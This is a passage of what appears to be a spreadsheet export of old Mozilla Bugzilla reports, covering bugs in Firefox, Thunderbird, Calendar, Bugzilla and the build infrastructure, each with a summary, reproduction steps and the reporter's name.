Code that generates recurrence summary in Edit Event dialog doesn't consider that some languages need weekdays nouns in plural form inside sentences like 
Every 
e.g. in Italian language (see https://wiki.mozilla.org/Talk:L20n:Examples):
  Saturday       -&gt; Sabato
  every Saturday -&gt; tutti i Sabati     ('Sabati' plural of 'Sabato')
  Sunday         -&gt; Domenica
  Every Sunday   -&gt; tutte le Domeniche ('Domeniche' plural of 'Domenica')
For a better translation should be considered this issue too. 
Reproducible: Always
Steps to Reproduce:
1. with a localized version of Sunbird\Lightning create a custom repeat event
2. select one of the following rules:
   - weekly with a weekday
   - monthly with every + a weekday
   - annually with every + a weekday
Actual Results:  
recurrence summary isn't correctly translated for languages that have grammar rule explained above.
Expected Results:  
a better translation.</t>
  </si>
  <si>
    <t>CORE-97014</t>
  </si>
  <si>
    <t>if alt+tab fails to switch windows menu gains focus</t>
  </si>
  <si>
    <t>neil@parkwaycc.co.uk said on bug 94175:
-----
If your ALT+TAB sequence doesn't switch windows then this also will active the
file menu. You can do this either by pressing ESC while the switcher is active
or by pressing ALT+TAB and ALT+SHIFT+TAB or by pressing lots of ALT+TABs.  [In 
contrast to bug 94175 which is Win95-only ] this also applies to Windows 98 
which will always show the switcher even on a very fast ALT+TAB.
-----</t>
  </si>
  <si>
    <t>TOOLKIT-512173</t>
  </si>
  <si>
    <t>.message-icon rule in toolkit/themes/winstripe/global/global.css points to non-existent icon</t>
  </si>
  <si>
    <t>As far as I can tell it could be intended to be information-32.png? That image seems to be nearest to the old alert-message.gif image.</t>
  </si>
  <si>
    <t>SEAMONKEY-246505</t>
  </si>
  <si>
    <t>simple html displays the  from entities</t>
  </si>
  <si>
    <t>A mail message displayed as simple html will show the  of entities. For example
 displays as   and  displays as 
Seeing this with linux gtk2 2004061218 (self made cvs build). Didn't see this
with my previous build 2004060321.
steps to reproduce:
1. send yourself a html+plaintext mail with at least an &amp; in it.
2. view the message as simple html
3. notice the extra 
4. check in plain text and originial html that the  shouldn't be there</t>
  </si>
  <si>
    <t>FIREFOX-445164</t>
  </si>
  <si>
    <t>Cookies not securely deleted from cookies.sqlite</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
After clearing private data the information may still remain in the .sqlite file although it can no longer be accessed by Firefox and SQLite.
Reproducible: Sometimes
Steps to Reproduce:
1. Make sure you haven't cleared your data in a long time (a few weeks)
2. Close Firefox.
3. Back up your data in your profile folder.
4. Start Firefox and go to Tools &gt; Clear Private Data.
5. Check all the boxes and press the Clear Private Data Now button.
6. Open a .sqlite file (cookies.sqlite for example) with a text editor.
Actual Results:  
The sqlite file is still the same size and except for some changes in the beginning it is identical. Personal data can can be easily read since it is in plain text.
Expected Results:  
No traces of the user's data should be left. If a user clears private data there must be a reason for doing so so it should not be so easily recoverable.
A solution could be to run VACUUM after the data is cleared.
This has been tested on Linux and Windows XP.</t>
  </si>
  <si>
    <t>ehsan</t>
  </si>
  <si>
    <t>alecm</t>
  </si>
  <si>
    <t>THUNDERBIRD-297254</t>
  </si>
  <si>
    <t>Replied status not applied after sending a message which was autosaved during composition</t>
  </si>
  <si>
    <t>found using 2005060905-trunk tbird build on linux fc3. the Replied status not
applied (displayed) in the mail 3pane window after sending a message which was
autosaved during composition.
setup
-----
- make sure that you've got the status column displayed in the mail 3pane window.
- make sure that you've turned on autosaving I had mine set to save every 5
minutes. that pref UI is located in Composition &gt; Advanced.
1. send a message to yourself.
2. once received view that message and note that the status is Read
3. reply to the message: eg hit Ctrl+R to bring up the message compose window.
4. enter some text if you want but don't send the response.
5. wait at least 5 more minutes (or the minimum amount of time you set for
autosaving) to ensure that autosave occurs --you can watch the statusbar to
verify that if you wish.
6. send the response message.
results: the message is sent but the status remains as Read rather than
changing to Replied
I tested this IMAP. will see if this also occurs on POP...</t>
  </si>
  <si>
    <t>SEAMONKEY-188739</t>
  </si>
  <si>
    <t>Amazon.com ad plastered in middle of IMDb page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC en-US rv:1.3b) Gecko/20030110
Build Identifier: Mozilla/5.0 (Macintosh U PPC en-US rv:1.3b) Gecko/20030110
I've attached an screen shot that shows this problem.  On the left side of the
window is a banner ad for Amazon.com and the ad forces the rest of page to be
formatted in an ugly way.  This problem does not occur with IE for the Mac
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>mozilla.org</t>
  </si>
  <si>
    <t>CORE-201040</t>
  </si>
  <si>
    <t>Unable to view page source of the page that uses IDN</t>
  </si>
  <si>
    <t>seen with 2003033103 build
Steps to reproduce:
- select an active IDN (http://.com/ big5)
- go to View|page source
- you get an error message (the screen shot of the message to follow)</t>
  </si>
  <si>
    <t>marina</t>
  </si>
  <si>
    <t>BUGZILLA-77699</t>
  </si>
  <si>
    <t>javascript error in quicksearch.js</t>
  </si>
  <si>
    <t>I expect this is a browser bug rather than a problem with quicksearch.js as it 
works on a different machine with windows 2000 and IE 5.5 but I don't know 
enough about javascript to be sure and quicksearch.js may be able to work 
around it anyway.
I'm using Internet Explorer 5 on a windows NT machine.
User Agent: Mozilla/4.0 (compatible MSIE 5.0 Windows NT DigExt)
If I go to the main index page either on our local bugzilla installation 
(2.12) or the main bugzilla site (2.11) and type (e.g.) bugzilla 
quicksearch into the quicksearch box it says:
 Line: 605
 Char: 5
 Error: 'undefined' is undefined
 Code: 0
 URL: http://bugzilla.mozilla.org/
If I OK the error it goes to
http://bugzilla.mozilla.org/show_bug.cgi?id=bugzilla+quicksearch
and offers to search by bug number.
It works fine (no error) if I type a bug number in instead of search terms.</t>
  </si>
  <si>
    <t>afranke</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-27137</t>
  </si>
  <si>
    <t>Getting removed from mailing lists due to excessive bounces</t>
  </si>
  <si>
    <t>The mozilla mailing list system is unsubscribing me from the lists (mainly 
mozilla-ui and mozilla-layout) with the message below -- my local postmaster 
people tell me that the problem is not this end because you should not be 
generating input lines that long!:
   Input line to submit longer than 510 characters
I don't get this problem with any of the other mailing lists I am
subscribed to at other sites...
---------- Forwarded message ----------
Subject: You have been removed from the list
From: mozilla-ui-request@mozilla.org
To: py8ieh=u3@bath.ac.uk
Your mail address py8ieh=u3@bath.ac.uk has been removed
from the mozilla-ui@mozilla.org mailinglist.
It generated an excessive amount of bounced mails.
Before sending in a subscription request to
mozilla-ui-request@mozilla.org again please ensure that
this problem has been resolved.  When in doubt ask your system
administrator or send mail to postmaster.
The last one of those bounced mails has been quoted below:
From MAILER-DAEMON  Thu Feb  3 18:11:28 2000
Received: from pat.bath.ac.uk (pat.bath.ac.uk [138.38.32.2])
       by gila.mozilla.org with ESMTP id SAA24981
       for  Thu 3 Feb 2000 18:11:27 -0800 
(PST)
Received: from exim by pat.bath.ac.uk with local (Exim 3.12 #1)
       id 12GYDW-0001bJ-00
       for mozilla-ui-request@mozilla.org Fri 04 Feb 2000 02:11:26 +0000
X-Failed-Recipients: py8ieh=u3@bath.ac.uk
From: Mail Delivery System 
To: mozilla-ui-request@mozilla.org
Subject: Mail delivery failed : returning message to sender
Message-Id: 
Date: Fri 04 Feb 2000 02:11:26 +0000
This message was created automatically by mail delivery software.
Email addresses for users at bath.ac.uk can be found at
    http://www.bath.ac.uk/cgi-bin/tel.pl
If you still have difficulties please contact:
    postmaster@bath.ac.uk
A message that you sent could not be delivered to all of its recipients.
The following address(es) failed (unless you receive other errors it
is safe to assume that the other addresses worked):
  py8ieh=u3@bath.ac.uk:
    SMTP error from remote mailer after end of data:
    host bucs.bath.ac.uk [138.38.32.34]:
    554 [ No such file or directory ] Input line to submit longer than 510 
characters
---------- End forwarded message ----------</t>
  </si>
  <si>
    <t>CORE-441233</t>
  </si>
  <si>
    <t>Missing focus events in Thunderbird account wizard dialog</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Delete any existing ~/.thunderbird
2. Launch Accerciser and turn event monitoring on.
3. Launch Thunderbird causing the Account wizard to appear.
Expected results:  Because a radio button has focus a focus: event and an
object:state-changed:focused event would each be issued for the focused radio
button.
Actual results: No focus events are issued for the focused radio button.
Note:  This was originally reported as bug #388187.  While the other dialogs mentioned were fixed it seems that the Account Wizard dialog was not.</t>
  </si>
  <si>
    <t>TOOLKIT-491073</t>
  </si>
  <si>
    <t>symbolstore.py can't handle filenames with spaces</t>
  </si>
  <si>
    <t>We discovered in bug 488512 that symbolstore.py fails on filenames containing spaces such as Default Plugin.plugin.
[7:03pm] smorgan: If I feed it in with extra quotes it gets silently ignored
[7:04pm] sauron: does \-escaping work?
[7:04pm] smorgan: If I do just about anything else dump_syms chokes on the input
[7:04pm] smorgan: I can try but I would imagine it'll end up the same as extra quotes
[7:07pm] smorgan: Yeah \ is like extra  silently fails
We've disabled generating symbols for it and hopefully should never crash there but this sounds like a bug in the script regardless.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-405201</t>
  </si>
  <si>
    <t>MDC and wikimo returning outage page</t>
  </si>
  <si>
    <t>We're getting the service outage redirect for all MDC accesses right now.  (I'm not sure where to look to see why that mode was turned on but I don't think there's any scheduled maintenance right now.)
Pls help!</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-427119</t>
  </si>
  <si>
    <t>modeline string for dehydra source</t>
  </si>
  <si>
    <t>Created attachment 313682
patch
Add modeline string for dehydra source code.</t>
  </si>
  <si>
    <t>vladimir.sukhoy</t>
  </si>
  <si>
    <t>CALENDAR-229314</t>
  </si>
  <si>
    <t>password is shown in plain text in error messages</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5) Gecko/20031215 Firebird/0.7
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5) Gecko/20031107 Debian/1.5-3
When a calendar file cannot be downloaded/parsed Mozilla Calendar shows the
password in plain text as a part of the URL in the error dialog.
Reproducible: Always
Steps to Reproduce:
1. Start Mozilla Calendar
2. Choose New Calendar from the popup menu
3. Type a location (http://localhost:9673/xxx.ical) username (my_username) and
password (my_secret_password)
4. Click OK
Actual Results:  
An alert dialog showed up with the following content:
  This doesn't appear to be a valid file.  Here's what I got back from
   http://my_username:my_secret_password@localhost:9673/xxx.ical:
   Result:[...]
Expected Results:  
The password should have been obscured.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-440219</t>
  </si>
  <si>
    <t>deleted imap messages reappear and disappear rapidly</t>
  </si>
  <si>
    <t>Created attachment 325670
proposed fix
David Ascher reported this Emre was able to reproduce something similar and I can reproduce it this way:
hide the message pane
select an imap folder
delete a bunch of messages by holding down the delete key
let go of the delete key
You'll see the deleted messages reappear and then disappear.
The issue is that when we connect to the imap server and try to sync the folder we check for messages that were offline deleted i.e. have offline delete ops in the database. But if the offline playback has started for those messages they're removed from the database so there's a window where the header is not in the db but the delete hasn't happened on the server.
This is because offline operations are removed/cleared when playback starts. I'm going to submit a patch that postpones the removal of the offline ops until the operation has actually finished on the server. This will allow us to better handle failures playing back offline operations (though we run the risk of getting stuck with an offline operation - which is a bit scary)</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-293905</t>
  </si>
  <si>
    <t>The website asks me to upgrade firefox to 1.0.4 and doesn't let me see the addons</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
I've already upgraded with the officially available 1.0.4
When i download the file offered by the site i get a file of the same size as
my original installer but its name is: firefox-2.0.4.installer.tar.gz
I cannot update the extensions via the extensions panel either.
Reproducible: Always</t>
  </si>
  <si>
    <t>bgp</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-320736</t>
  </si>
  <si>
    <t>Reporter</t>
  </si>
  <si>
    <t>Bad accesskey (button Submit Report)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20051218 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20051218 Firefox/1.6a1
There is a bad accesskey in Reporter. First window of wizard button Submit Report &gt; (N).
Reproducible: Always
Steps to Reproduce:
1. Choose Help -&gt; Report Broken Web Site.
2. There is a bad accesskey. See attachment.
3.</t>
  </si>
  <si>
    <t>BUGZILLA-286461</t>
  </si>
  <si>
    <t>Unknown table 'map_products' in where clause</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 rv:1.7.3) Gecko/20041020 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 rv:1.7.3) Gecko/20041020 Firefox/0.10.1
When creating a graphical report and selecting bugs using the Classification
filter but not using Classification in any of the axis the query fails:
DBD::mysql::st execute failed: Unknown table 'map_products' in where clause [for
Statement SELECT 42217354 map_components.name 42217354 FROM bugs components
AS map_components  LEFT JOIN bug_group_map  ON bug_group_map.bug_id =
bugs.bug_id  AND bug_group_map.group_id NOT IN
(731051418111242613159)  LEFT JOIN cc ON cc.bug_id = bugs.bug_id
AND cc.who = 1 WHERE bugs.component_id = map_components.id AND
((map_products.classification_id IN (3)) AND (bugs.bug_status IN
('NEW''ASSIGNED''REOPENED'))) AND ((bug_group_map.group_id IS NULL)    OR
(bugs.reporter_accessible = 1 AND bugs.reporter = 1)     OR
(bugs.cclist_accessible = 1 AND cc.who IS NOT NULL)     OR (bugs.assigned_to =
1) OR (bugs.qa_contact = 1) ) GROUP BY bugs.bug_id] at Bugzilla/DB.pm line 62
	Bugzilla::DB::SendSQL('SELECT 42217354 map_components.name 42217354 FROM
bugs com...') called at /var/www/html/Testzilla/report.cgi line 155
Reproducible: Always
Steps to Reproduce:
1.Create a classification
2.Add a product to classification
3.Add a few components to product
4.Add a few bugs to components
5.Go to Generate graphical report
6.Select a classification in the classification drop down list
7.select Component on horizontal axis
Breaks
It works if Component is selected on any of the axis.
I edited report.cgi and changed line 140 from:
if (lsearch(\@axis_fieldsclassification) &gt;= 0) {
to
if (lsearch(\@axis_fieldsclassification) &gt;= 0 || defined
$cgi-&gt;param('classification')) {
which seems to solve the problem.
This is my first time messing with bugzilla code does my change make sense?</t>
  </si>
  <si>
    <t>kristli</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-467721</t>
  </si>
  <si>
    <t>the l10n factory should run its steps inside of the build folder</t>
  </si>
  <si>
    <t>The rm -rf *-nightly/build that was added to other nightly factories removes the build folder inside every *-nightly folders on a slave
In the l10n steps on the RepackFactory mozilla-central repo and the l10n-central repo are checked out into . instead of build therefore not being deleted by other nightly builds runs.
Fixing this will ensure that when other nightly builds start we will be sure that anything checked out by the l10n steps gets cleaned out so we 1) keep the disk usage low and will ensure that 2) we start the l10n process from a fresh point every night
CURRENTLY
.
./build &lt;- This guy is removed
./mozilla-central &lt;- This guy is *not* being removed because it is not inside of the previous folder
./l10n-central
IT SHOULD BE:
.
./build/mozilla-central &lt;- This guy and the next should now be removed since they live inside of  *-nightly/build
./build/l10n-central
Side note the l10n nightly runs will not be deleting themselves (or other branches' l10n nightly runs) since their remove step is slightly different from other normal nightly runs:
 'find .. -maxdepth 2 -type d -path *-nightly/build -not -path *-l10n-nightly/build -print -exec rm -rf {} \'</t>
  </si>
  <si>
    <t>armenzg</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-454103</t>
  </si>
  <si>
    <t>Make nsIMsgCompFields's attachments an nsISimpleEnumerator</t>
  </si>
  <si>
    <t>Created attachment 337329
patch v1
This is me trying to force myself to pick up a bit more c++. This switches nsIMsgCompField's attachmentsArray property to be an nsISimpleEnumerator instead of an nsISupportsArray. It also switches the internal m_attachments to be a nsCOMArray.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-501764</t>
  </si>
  <si>
    <t>cb-xserve03.mozilla.com is down</t>
  </si>
  <si>
    <t>I just noticed cb-xserve03.mozilla.com dropped from the buildbot slave list and I can't even ping it from cb-jump01.</t>
  </si>
  <si>
    <t>TESTOPIA-443018</t>
  </si>
  <si>
    <t>Login through XMLRPC doesn't pass through group permissions</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 .NET CLR 1.1.4322 .NET CLR 2.0.50727 .NET CLR 3.0.04506.30 InfoPath.1 .NET CLR 3.0.04506.648)
Build Identifier: 
I executed a User.login proxy call then a User.Create. It returned back that I was not in the 'editusers' group so could not create a user even though the user I logged in with had the rights assigned to it.
Reproducible: Always
Expected Results:  
Logging in with a user via XMLRPC should give me the group rights assigned to that user for additional commands.
I have a patch which I will attach that fixes the problem.</t>
  </si>
  <si>
    <t>rnelson</t>
  </si>
  <si>
    <t>FIREFOX-414702</t>
  </si>
  <si>
    <t>Style identity information contextual dialog on OS X</t>
  </si>
  <si>
    <t>We need to theme the identity information contextual dialog for OS X.  Here is a set of potential styles:
http://people.mozilla.com/~faaborg/files/granParadisoUI/osxContextualDialogStyle_i1.png
Of these we think we are going to go with the context bar style for OS X.
Note that bug 403158 is tracking the appearance of the bookmarks contextual dialog which will use the same visual style.</t>
  </si>
  <si>
    <t>faaborg</t>
  </si>
  <si>
    <t>CORE-185775</t>
  </si>
  <si>
    <t>[Animated GIF] Optimize 1st Frame refresh rect</t>
  </si>
  <si>
    <t>Letsay you have an animated GIF with 100 frames.  The image and Frame 0 is
468x60.  Frames 1-50 are 10x10 starting at (45850).  Frames 51-99 are 10x15
starting at (45840).  When the animation loops we only need to update
(x=458y=40)(w=10h=20) because that's all that has changed.  Right now we
update (00)(45840) which wastes CPU cycle and graphics card CPU cycles.
This bug fix will create a imgContainerGIF::mFirstFrameRefreshArea variable and
calculate the dirtyRect that will be sent to FrameChanged() everytime the image
loops back to the 1st frame.   All praise UnionRect! )</t>
  </si>
  <si>
    <t>paper</t>
  </si>
  <si>
    <t>TREE_MANAGEMENT_GRAVEYARD-529323</t>
  </si>
  <si>
    <t>TBPL</t>
  </si>
  <si>
    <t>TREE_MANAGEMENT_GRAVEYARD</t>
  </si>
  <si>
    <t>tinderboxpushlog should have a way to go to a specific date/time</t>
  </si>
  <si>
    <t>It would be nice if tinderboxpushlog had a way to go to a specific date so that I could see the log from a number of days back (when there's a specific date/time I know I want) without having to keep clicking the down arrow.</t>
  </si>
  <si>
    <t>CORE-69700</t>
  </si>
  <si>
    <t>Autocompletion from multiple sources</t>
  </si>
  <si>
    <t>LDAP needs autocompletion from multiple sources using this to track its 
implementation (should be easy -- it's already partially working just need to 
figure out how to coalesce the result arrays properly).</t>
  </si>
  <si>
    <t>FIREFOX-236343</t>
  </si>
  <si>
    <t>Full screen mode shows Windows-like minimize/maximize/close buttons on Mac</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O rv:1.6) Gecko/20040206 Firefox/0.8
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O rv:1.6) Gecko/20040206 Firefox/0.8
When you enter full screen mode in Mac FireFox v0.8 minimize maximize and
close buttons are added to the upper right of the browser window.  This is a
nice feature but is very incongruous on a Mac since the icons used for those
buttons are the Windows icons.
Reproducible: Always
Steps to Reproduce:
1. Press F11 to enter fullscreen mode
Actual Results:  
See three Windows icons in the upper right of the browser window
Expected Results:  
Not sure.</t>
  </si>
  <si>
    <t>chris+bugzilla</t>
  </si>
  <si>
    <t>THUNDERBIRD-431746</t>
  </si>
  <si>
    <t>No access keys for Recent File here and Copy here in folder menus</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9pre) Gecko/2008050103 Thunderbird/3.0a1pre
In Move and Copy menus the menuitems for Recent File here and Copy here have lost their access keys.
Reproducible: Always
Steps to Reproduce:
1. Select a message
2. Choose (for example) Message - Move
Actual Results:  
The Recent item should have an underscore under the R.
This happens because mail-folder-bindings.xml specifies accessKey attributes with a capital K.  They should be all lowercase: accesskey</t>
  </si>
  <si>
    <t>rod.whiteley</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-115290</t>
  </si>
  <si>
    <t>Embedding: ActiveX Wrapper</t>
  </si>
  <si>
    <t>NPN_PostURL () is not posting data when target window != NULL</t>
  </si>
  <si>
    <t>In a call to NPN_PostURL(NPP npp const char *relativeURL const char *target 
uint32 len const char *buf NPBool file) with buf containing zero delimited 
data and target = _self the actual processing function _OpenURL() never 
initializes vPostData before calling the Navigate method of IWebBrowser2.</t>
  </si>
  <si>
    <t>bpettit</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-481464</t>
  </si>
  <si>
    <t>pm-ns01 has a bad drive</t>
  </si>
  <si>
    <t>failed drive on PM-NS01</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-351847</t>
  </si>
  <si>
    <t>AMO experiencing database errors</t>
  </si>
  <si>
    <t>https://addons.mozilla.org/install.php?uri=http://releases.mozilla.org/pub/mozilla.org/extensions/adblock_filterset.g_updater/adblock_filterset.g_updater-0.3.0.4-fx+fl+mz+ns.xpi shows the db error.
Possibly related:
https://addons.mozilla.org/developers/ comes back blank.</t>
  </si>
  <si>
    <t>CORE-253143</t>
  </si>
  <si>
    <t>Letter spacing is applied to zero width characters (zwsp zwj zwnj)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.7) Gecko/20040724 Firefox/0.9.1+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.7) Gecko/20040724 Firefox/0.9.1+
Where a zero width space exists but there is no line-break CSS letter-spacing
is applied to the zero width space.
Testcase follows.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-469111</t>
  </si>
  <si>
    <t>[de] [OS/2] Bug 460247: move the OS/2 README.txt files out...</t>
  </si>
  <si>
    <t>en-US:
http://hg.mozilla.org/mozilla-central/rev/4f38214f17c0
l10n-central:
http://hg.mozilla.org/l10n-central/de/rev/fadf937898a9
l10n-1.9.1:
noch nicht im Branch</t>
  </si>
  <si>
    <t>CORE-92858</t>
  </si>
  <si>
    <t>[FILE INPUT] can change the contents of a DISABLED   by using keyboard navigation</t>
  </si>
  <si>
    <t>build ID : 2001-07-27
OS : tested on win2000 linux redhat 7.1 and macOS 8.6
If i use the tab key to navigate through the form-control [FILE INPUT]and hit 
the enter key to the corresponding control (whether it is disabled or not)  i 
get a file upload dialog box and am able to select anmd upload a file to show in 
the control.
steps to reproduce:
1. open the testcase via the above mentioned URL
2. tab to the first control - this is an enabled [file input] control.
3. hit the enter key 
what happens ? -- the file upload dialog box will appear. select a file and say 
open. the file selected will be uploaded in the enabled  control.
4. U will have to hit the key once or twice more -- so that the focus is removed 
from the enabled control.
actual:
=======
what happens? --- the next control is the disabled  control. you 
will notice that there is no visible focus on this control. Hit the Enter key.
Again -- the file upload dialog box will appear. select a file and say open. the 
file selected will be uploaded in the disabled  control. 
The disabled control seems to have a focus though there is no visible evidence  
-- the carat sign does not flicker in this control.
expected:
=========
disabled controls are not supposed to get focus of any kind.</t>
  </si>
  <si>
    <t>madhur</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG_GRAVEYARD-523642</t>
  </si>
  <si>
    <t>[zh-TW] Thunderbird 3 in-product pages localization</t>
  </si>
  <si>
    <t>You will find in bug #523583 instructions about the 2 in-product pages to be localized for the Thundebird 3 release planned this quarter.
The files are on the SVN repository in your locale folder preferably commit
directly to SVN and once done inform in this bug.
Alternatively you can attach the files to this bug (either individually or as
a zip archive).
If you attach individual .html files please attach them with the plain/text
Mime format.
News and instructions affecting all locales will be posted and updated if
necessary in the master bug (bug #523583)
Thanks!!</t>
  </si>
  <si>
    <t>abev66</t>
  </si>
  <si>
    <t>CORE-167631</t>
  </si>
  <si>
    <t>Can enter CJK Characters when MOZ_UNICODE is set</t>
  </si>
  <si>
    <t>When MOZ_UNICODE is set mozilla morph into an Unicode application.
However WM_IME_CHAR message handler need to be updated accordingly.
Windows now sends IME char in UCS2 codepoint.  (before Unicode
we were receiving locale codepoint)
Patch to follow.</t>
  </si>
  <si>
    <t>CORE-340724</t>
  </si>
  <si>
    <t>Upgrade NSS on Mozilla 1.8 branch for 1.8.1 final</t>
  </si>
  <si>
    <t>Prior to the release of FF/TB 2 we'll need to update the NSS version on the 1.8 branch to pick up some fixes.
This bug tracks the required NSS bugs.</t>
  </si>
  <si>
    <t>BUGZILLA-359768</t>
  </si>
  <si>
    <t>Confusing error message when a user has too many votes for a product</t>
  </si>
  <si>
    <t>I'm not sure which it is but I believe there's a bug somewhere
Steps to reproduce:
1. create a product Penelope
2. set max votes per user to 1
3. set max votes per bug to 1000
see bug 359732 for next steps
4) Vote for https://bugzilla.mozilla.org/show_bug.cgi?id=359221
5) Attempt to vote for https://bugzilla.mozilla.org/show_bug.cgi?id=359227
Actual Results:
        1 vote used out of 1 allowed. 
If you attempt to vote for the second bug you are taken to a page that says:
Illegal Vote
You tried to use 2 votes which exceeds the 1 vote per bug limit for the
product.
Please press Back and try again.
Expected Results:
if there's a 1 vote per bug limit for the product then it should not be possible to get an error that says you exceeded the 1 vote per bug limit. This just doesn't make any sense. Either the user exceeded the product limit (my guess) in which case the wrong error was returned. Or bugzilla offered an edit field which makes no sense in this case.
Note: if the user has used up all but one vote and a product allows 2 votes per bug then i'd suggest we give a checkbox with a note that they can remove votes in order to stuff the ballot box.</t>
  </si>
  <si>
    <t>CORE-524104</t>
  </si>
  <si>
    <t>Markers should be affected by group opacity on the marked element</t>
  </si>
  <si>
    <t>Markers should be affected by group opacity on the marked element. Currently that isn't the case in Mozilla.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-369454</t>
  </si>
  <si>
    <t>lt / Lithuanian</t>
  </si>
  <si>
    <t>[toolkit] Correct a spelling error in Lithuanian translation in MOZILLA_1_8_BRANCH</t>
  </si>
  <si>
    <t>Created attachment 254134
The patch
The team LT has discovered a spelling error in toolkit translation and we'd like to have it fixed in MOZILLA_1_8_BRANCH</t>
  </si>
  <si>
    <t>rimas</t>
  </si>
  <si>
    <t>CALENDAR-139490</t>
  </si>
  <si>
    <t>repeated events don't work correctly without X RecurUnits property</t>
  </si>
  <si>
    <t>Events without this field are repeated (according to the frontend) every 0
weeks which translates to once per week. But actually once a year is selected
with the RRULE property.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-178584</t>
  </si>
  <si>
    <t>JavaScript code fails to stop at an enabled breakpoint.</t>
  </si>
  <si>
    <t>JavaScript Debugger starts and I am able to load and view all JavaScript modules
in the page I am browsing. I am able to set breakpoints but execution never stops
at a valid breakpoint.  I have inserted alert statements so I am sure I am passing
the breakpoint.  I am using Mosilla 1.1 GA.</t>
  </si>
  <si>
    <t>dburtness</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-477296</t>
  </si>
  <si>
    <t>Can't push to hg.mozilla.org</t>
  </si>
  <si>
    <t>I was trying to push some changes to a user repo on hg.m.o but I get permission denied errors when ssh'ing in.
Permission denied (publickeygssapi-with-mic).
This is the first time I was trying to push so I wonder if I'm using the right credentials. I read the Mercurial FAQ on MDC and used username dirkjan@ochtman.nl (and tried djc for good measure). My account request was bug 453612.</t>
  </si>
  <si>
    <t>dirkjan</t>
  </si>
  <si>
    <t>BUGZILLA-365293</t>
  </si>
  <si>
    <t>[mod_perl] click OR AND or ADD... button in bool charts initiates search</t>
  </si>
  <si>
    <t>FIREFOX-287952</t>
  </si>
  <si>
    <t>[nightly] Crash on inital startup (dies and won't rise agian)</t>
  </si>
  <si>
    <t>When running the latest nightly on a dual Pentium IV system with Windows XP Pro
SP2 (with a previous installation of Firefox 1.0.1 that was /not/ removed before
install.) two error messages appear on first start the program remains in
memory and future trys to access the program fail silently.
Steps to Reproduce:
1. Download the March 27 05 nightly build
2. Run the installer
3. Watch the crash on first start.
The attached screenshot shows the error messages which are:
The procedure entry point ?Equals@nsCSubstring@@QBEHABV1@@Z could not be
located in the dynamic link library xpcom.dll. and
The procedure entry point PL_DHashTableFinish could not be located in the
dynamic link library xpcom.dll.
Talkback won't catch the error so it's impossible to track the exact point of
disaster....
I'm going to try this on other system in the next few min. as well.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-103364</t>
  </si>
  <si>
    <t>centrelink.gov.au - CentreLink Website InAccessible</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win98 en-US rv:0.9.4) Gecko/20010913
BuildID:    2001091303
People want to go hunt for jobs in Australia. They want to visit CentreLink's
website and type in the URL. They get to a white page of nothing. The index page
is suppose to redirect to the following page but it doesn't in Mozilla
(http://www.centrelink.gov.au/internet/internet.nsf/home/index.htm).
Reproducible: Always
Steps to Reproduce:
1. Surf to http://www.centrelink.gov.au/
2. Watch the white page. Pretty dull eh?
3. Open IE and do the same thing.
4. IE redirects to http://www.centrelink.gov.au/internet/internet.nsf/home/index.htm
5. Mozilla doesn't
Actual Results:  A blank white page of neverland.
Expected Results:  A redirection to the pages with real content.
IE works it right.
Go Mozilla.</t>
  </si>
  <si>
    <t>kunathma</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-390146</t>
  </si>
